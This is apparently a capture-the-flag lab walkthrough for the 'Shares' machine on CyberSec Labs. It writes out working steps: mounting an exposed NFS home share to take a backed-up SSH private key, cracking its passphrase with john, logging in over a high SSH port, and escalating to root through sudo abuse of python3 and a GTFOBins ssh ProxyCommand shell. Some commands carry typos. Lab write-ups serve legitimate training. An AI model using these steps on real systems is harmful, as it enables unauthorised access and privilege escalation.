172.31.1.7

CyberSec Labs Shares Walkthrough.

As the name itself suggest, it has an nfs share open

Looks like /home/amir can be mounted to our machine

Using mount –t nfs 172.31.1.7:/home/amir  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/ folder

Going to shares folder we find .ssh folder and id_rsa.bak file for user amir

Great so we can use ssh2john and then john to crack the passphrase for this id_rsa.bak

But in normal nmap scan we couldn’t find ssh port, maybe because  it was running on higher port.

We can use nmap automator to scan all higher ports quickly

So ssh is running on port 27853 (sweet!)

ssh –I id_rsa –p 27853 amir@172.31.1.7 and we get a shell

Priv Esc

Running sudo –l we get user amy can run python3 as root so

Sudo –u amy /usr/bin/python3 –c “import pty;pty.spawn(‘/bin/bash’)”

And we are logged in as user amy

Again as user amy running sudo –l we come to know user amy can run ssh as root

Easy, ssh gtfobins as sudo and ur root 😛

Sudo /usr/bin/ssh –o ProxyCommans=’;bash 0<&2 1>&2’ x

Flags

Author

Sentinal920